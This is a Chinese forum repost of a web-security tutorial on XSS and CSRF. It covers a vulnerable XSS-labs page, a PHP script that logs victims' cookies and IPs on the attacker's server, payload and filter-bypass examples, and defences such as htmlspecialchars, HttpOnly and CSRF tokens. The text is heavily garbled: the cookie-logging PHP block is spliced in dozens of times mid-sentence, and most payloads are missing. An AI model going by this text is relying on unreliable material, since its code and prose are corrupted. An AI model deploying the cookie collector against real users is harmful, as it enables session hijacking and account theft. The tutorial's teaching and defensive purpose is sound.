  410. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  411. fclose($fp);
  412. ?> <?php
  413. $cookie = $_GET['cookie'];
  414. $ip = getenv ('REMOTE_ADDR');
  415. $time = date('Y-m-d g:i:s');
  416. $fp = fopen("cookie.txt","a");
  417. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  418. fclose($fp);
  419. ?> ?>
  420. <?php
  421. $cookie = $_GET['cookie'];
  422. $ip = getenv ('REMOTE_ADDR');
  423. $time = date('Y-m-d g:i:s');
  424. $fp = fopen("cookie.txt","a");
  425. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  426. fclose($fp);
  427. ?> <?php
  428. $cookie = $_GET['cookie'];
  429. $ip = getenv ('REMOTE_ADDR');
  430. $time = date('Y-m-d g:i:s');
  431. $fp = fopen("cookie.txt","a");
  432. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  433. fclose($fp);
  434. ?> <?php
  435. $cookie = $_GET['cookie'];
  436. $ip = getenv ('REMOTE_ADDR');
  437. $time = date('Y-m-d g:i:s');
  438. $fp = fopen("cookie.txt","a");
  439. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  440. fclose($fp);
  441. ?> <?php
  442. $cookie = $_GET['cookie'];
  443. $ip = getenv ('REMOTE_ADDR');
  444. $time = date('Y-m-d g:i:s');
  445. $fp = fopen("cookie.txt","a");
  446. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  447. fclose($fp);
  448. ?> <center><img<?php
  449. $cookie = $_GET['cookie'];
  450. $ip = getenv ('REMOTE_ADDR');
  451. $time = date('Y-m-d g:i:s');
  452. $fp = fopen("cookie.txt","a");
  453. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  454. fclose($fp);
  455. ?> src=level1.png></center>
  456. <?php
  457. $cookie = $_GET['cookie'];
  458. $ip = getenv ('REMOTE_ADDR');
  459. $time = date('Y-m-d g:i:s');
  460. $fp = fopen("cookie.txt","a");
  461. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  462. fclose($fp);
  463. ?> <?php
  464. $cookie = $_GET['cookie'];
  465. $ip = getenv ('REMOTE_ADDR');
  466. $time = date('Y-m-d g:i:s');
  467. $fp = fopen("cookie.txt","a");
  468. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  469. fclose($fp);
  470. ?> <?php
  471. $cookie = $_GET['cookie'];
  472. $ip = getenv ('REMOTE_ADDR');
  473. $time = date('Y-m-d g:i:s');
  474. $fp = fopen("cookie.txt","a");
  475. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  476. fclose($fp);
  477. ?> <?php
  478. $cookie = $_GET['cookie'];
  479. $ip = getenv ('REMOTE_ADDR');
  480. $time = date('Y-m-d g:i:s');
  481. $fp = fopen("cookie.txt","a");
  482. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  483. fclose($fp);
  484. ?> <?php<?php
  485. $cookie = $_GET['cookie'];
  486. $ip = getenv ('REMOTE_ADDR');
  487. $time = date('Y-m-d g:i:s');
  488. $fp = fopen("cookie.txt","a");
  489. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  490. fclose($fp);
  491. ?>
  492. <?php
  493. $cookie = $_GET['cookie'];
  494. $ip = getenv ('REMOTE_ADDR');
  495. $time = date('Y-m-d g:i:s');
  496. $fp = fopen("cookie.txt","a");
  497. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  498. fclose($fp);
  499. ?> <?php
  500. $cookie = $_GET['cookie'];
  501. $ip = getenv ('REMOTE_ADDR');
  502. $time = date('Y-m-d g:i:s');
  503. $fp = fopen("cookie.txt","a");
  504. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  505. fclose($fp);
  506. ?> <?php
  507. $cookie = $_GET['cookie'];
  508. $ip = getenv ('REMOTE_ADDR');
  509. $time = date('Y-m-d g:i:s');
  510. $fp = fopen("cookie.txt","a");
  511. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  512. fclose($fp);
  513. ?> <?php
  514. $cookie = $_GET['cookie'];
  515. $ip = getenv ('REMOTE_ADDR');
  516. $time = date('Y-m-d g:i:s');
  517. $fp = fopen("cookie.txt","a");
  518. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  519. fclose($fp);
  520. ?> echo<?php
  521. $cookie = $_GET['cookie'];
  522. $ip = getenv ('REMOTE_ADDR');
  523. $time = date('Y-m-d g:i:s');
  524. $fp = fopen("cookie.txt","a");
  525. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  526. fclose($fp);
  527. ?> "<h3<?php
  528. $cookie = $_GET['cookie'];
  529. $ip = getenv ('REMOTE_ADDR');
  530. $time = date('Y-m-d g:i:s');
  531. $fp = fopen("cookie.txt","a");
  532. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  533. fclose($fp);
  534. ?> align=center>payload的长度:".strlen($str)."</h3>";
  535. <?php
  536. $cookie = $_GET['cookie'];
  537. $ip = getenv ('REMOTE_ADDR');
  538. $time = date('Y-m-d g:i:s');
  539. $fp = fopen("cookie.txt","a");
  540. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  541. fclose($fp);
  542. ?> <?php
  543. $cookie = $_GET['cookie'];
  544. $ip = getenv ('REMOTE_ADDR');
  545. $time = date('Y-m-d g:i:s');
  546. $fp = fopen("cookie.txt","a");
  547. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  548. fclose($fp);
  549. ?> <?php
  550. $cookie = $_GET['cookie'];
  551. $ip = getenv ('REMOTE_ADDR');
  552. $time = date('Y-m-d g:i:s');
  553. $fp = fopen("cookie.txt","a");
  554. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  555. fclose($fp);
  556. ?> <?php
  557. $cookie = $_GET['cookie'];
  558. $ip = getenv ('REMOTE_ADDR');
  559. $time = date('Y-m-d g:i:s');
  560. $fp = fopen("cookie.txt","a");
  561. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  562. fclose($fp);
  563. ?> ?>
  564. <?php
  565. $cookie = $_GET['cookie'];
  566. $ip = getenv ('REMOTE_ADDR');
  567. $time = date('Y-m-d g:i:s');
  568. $fp = fopen("cookie.txt","a");
  569. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  570. fclose($fp);
  571. ?> <?php
  572. $cookie = $_GET['cookie'];
  573. $ip = getenv ('REMOTE_ADDR');
  574. $time = date('Y-m-d g:i:s');
  575. $fp = fopen("cookie.txt","a");
  576. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  577. fclose($fp);
  578. ?> </body>
  579. </html>
复制代码
$str<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> =<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> $_GET["name"];<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> //获取参数传入
echo<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> "欢迎用户".$str."

";<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> //用户输入什么就输出什么
代码中并没有对用户输入进行检查,直接输出到页面中。所以存在xss
测试:

可以构造如下payload
/level1.php?name=



2、利用xss获取当前用户的cookie

测试是否有弹窗

编写获取cookie的脚本,放自己的服务器下面,内容如下
  1. <?php
  2. $cookie = $_GET['cookie'];
  3. $ip = getenv ('REMOTE_ADDR');
  4. $time = date('Y-m-d g:i:s');
  5. $fp = fopen("cookie.txt","a");
  6. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  7. fclose($fp);
  8. ?>
复制代码
构造payload

发现有长度限制,在前端修改长度


在另外一台主机访问,发现自己的服务器得到了cookie

三、xss测试与利用

1.xss发现

a、步骤


  • 在每个利用点插入一个正确的输入,而且该输入没有出现在页面的任何地方,这样查找就比较方便
  • 查看该输入在响应中的所有位置,并查看所处上下文
  • 构造恶意payload
  • 查看响应是否被组织或者净化,然后进行绕过。
b、实例:

(1)假设返回的响应包含如下的脚本

测试思路:
<ul<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> ><li<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> id="u79889f0b">终止input标签,构造script脚本<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> :"><li<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> id="uff401523"><strong>在input标签添加一个事件处理器<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> :"<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> u1563f887"<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> >(2)假设返回的响应包含如下的脚本</p>
测试思路:

  • 终止单引号,分号终止语句,然后插入脚本<?php
    $cookie = $_GET['cookie'];
    $ip = getenv ('REMOTE_ADDR');
    $time = date('Y-m-d g:i:s');
    $fp = fopen("cookie.txt","a");
    fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
    fclose($fp);
    ?> :';<?php
    $cookie = $_GET['cookie'];
    $ip = getenv ('REMOTE_ADDR');
    $time = date('Y-m-d g:i:s');
    $fp = fopen("cookie.txt","a");
    fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
    fclose($fp);
    ?> alert(1);var<?php
    $cookie = $_GET['cookie'];
    $ip = getenv ('REMOTE_ADDR');
    $time = date('Y-m-d g:i:s');
    $fp = fopen("cookie.txt","a");
    fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
    fclose($fp);
    ?> foo<?php
    $cookie = $_GET['cookie'];
    $ip = getenv ('REMOTE_ADDR');
    $time = date('Y-m-d g:i:s');
    $fp = fopen("cookie.txt","a");
    fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
    fclose($fp);
    ?> ='
(3)假设返回的响应包含如下的脚本:
click<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> here…
测试思路:
<ul<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> ><li<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> id="ud1618395">使用伪协议:javascript:alert(1)<li<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> id="u275b5095">使用事件处理器:#<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> "E2HBp">c、探查防御措施

一般的防御有以下的几种:

  • 防火墙发现恶意标签,组织了输入
  • 接受了输入,但是进行了净化或者编码处理
  • 将输入字符截短到某个最大长度
d、绕过

如果是防火墙过滤,则轮流删除字符串的不同部分,确定阻止了哪个标签,然后进行绕过
下面总结几种绕过:
  1. [img]http://dis.qidao123.com/vaild.gif<?php
  2. $cookie = $_GET['cookie'];
  3. $ip = getenv ('REMOTE_ADDR');
  4. $time = date('Y-m-d g:i:s');
  5. $fp = fopen("cookie.txt","a");
  6. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  7. fclose($fp);
  8. ?> <?php
  9. $cookie = $_GET['cookie'];
  10. $ip = getenv ('REMOTE_ADDR');
  11. $time = date('Y-m-d g:i:s');
  12. $fp = fopen("cookie.txt","a");
  13. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  14. fclose($fp);
  15. ?> onreadystatechange=alert(1)[/img]
复制代码
2.xss利用

1、网络钓鱼,包括获取各类用户账号
2、窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作;
3、劫持用户(浏览器)会话,从而执行任意操作,例如非法转账、强制发表日志、电子邮件等
4、强制弹出广告页面、刷流量等
5、网页挂马;
6、进行恶意操作,如任意篡改页面信息、删除文章等
7、进行大量的客户端攻击,如ddos等
8、获取客户端信息,如用户的浏览历史、真实p、开放端口等
9、控制受害者机器向其他网站发起攻击;
10、结合其他漏洞,如csrf,实施进步危害;
11、提升用户权限,包括进一步渗透网站
12、传播跨站脚本蠕虫等
四、防御

1.HTML实体化

htmlspecialchars():可以把输入内容转换为HTML实体

&quot
'
&apos
&
&amp
</p/tdtd<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> width="342"p<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> id="ud2cda502"<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> &lt/p/td/trtrtd<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> width="86"p<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> id="u51909476"<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> >
&gt
2.输入过滤

对用户提交的数据进行有效验证,仅接受指定长度范围内的,采用适当格式的内容提交,阻止或者忽略除此以外的其他任何数据。

  • 输入是否仅仅包含合法的字符
  • 输入字符串是否超过最大长度的限制
  • 输入如果为数字,数字是否在指定的范围内
  • 输入是否符合特定的格式要求,如邮箱、电话号码、ip地址等
3.httponly设置

XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 一般利用js脚步读取用户浏览器中的Cookie,而如果在服务器端对<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> Cookie<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 设置了HttpOnly<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 属性,那么js脚本就不能读取到cookie,但是浏览器还是能够正常使用cookie
一般的Cookie都是从document对象中获得的,现在浏览器在设置<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> document对象中就看不到Cookie了,而浏览器在浏览的时候不受任何影响,因为Cookie会被放在浏览器头中发送出去(包括ajax的时<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 候),应用程序也一般不会在js里操作这些敏感Cookie的,对于一些敏感的Cookie我们采用HttpOnly,对于一些需要在应用程序中用js操作的cookie我们就不予设置,这样就保障了Cookie信息的安全也保证了应用。
五、csrf原理及利用

1、csrf原理与利用

原理:
跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件、发消息、甚至财产操作:转账、购买商品等)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份认证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。
场景:
1.用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A;
2.在用户信息用过验证后,网站A产生Cookie信息并返回给浏览器,此时用户登录网站A成功,可以正常发送请求到网站A;
3.用户未退出网站A之前,在同一浏览器中打开一个TAB页访问网站B;
4.网站B接受到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点A;
5.浏览器在接收到这些攻击性代码后,根据网站B的请求,在用户不知情的情况下携带Cookie信息,向网站A发出请求。网站A并不知道该请求其实是由B发起的,所以会根据用户C的Cookie信息以C的权限处理该请求,导致来自网站B的恶意代码被执行。
检测:
1.检测CSRF漏洞是一项比较繁琐的工作,最简单的方法就是抓取一个正常请求的数据包,去掉Referer字段后再重新提交,如果该提交还有效,那么基本上可以确定存在CSRF漏洞。
2.随着对CSRF漏洞研究的不断深入,不断涌现出一些专门针对CSRF漏洞检测的工具,若CSRFTester,CSRF<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> Request<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> Builder等。
3.用burp自带的csrf制作工具对数据包修改,然后在浏览器执行测试。
防御:
1.验证HTTP<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> Referer字段;
2.在请求地址中添加token并验证;
客户端把用户的用户名和密码发到服务端服务端进行校验,校验成功会生成token,<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 把token发送给客户端客户端自己保存token,<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 再次请求就要在Http协议的请求头中带着token去访问服务端,和在服务端保存的token信息进行比对校验。
3.在HTTP头中自定义属性并验证。
CSRF与XSS的区别:最大的区别就是CSRF没有盗取用户的Cookie,而是直接的利用了浏览器的Cookie让用户去执行某个动作。
各种功能点

  • 密码修改处
  • 点赞
  • 转账
  • 注销
  • 删除
出处:http://www.cnblogs.com/-xiaopeng1/本文版权归作者和博客园共有,欢迎转载,但必须给出原文链接,并保留此段声明,否则保留追究法律责任的权利。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

曹旭辉

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

存储 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表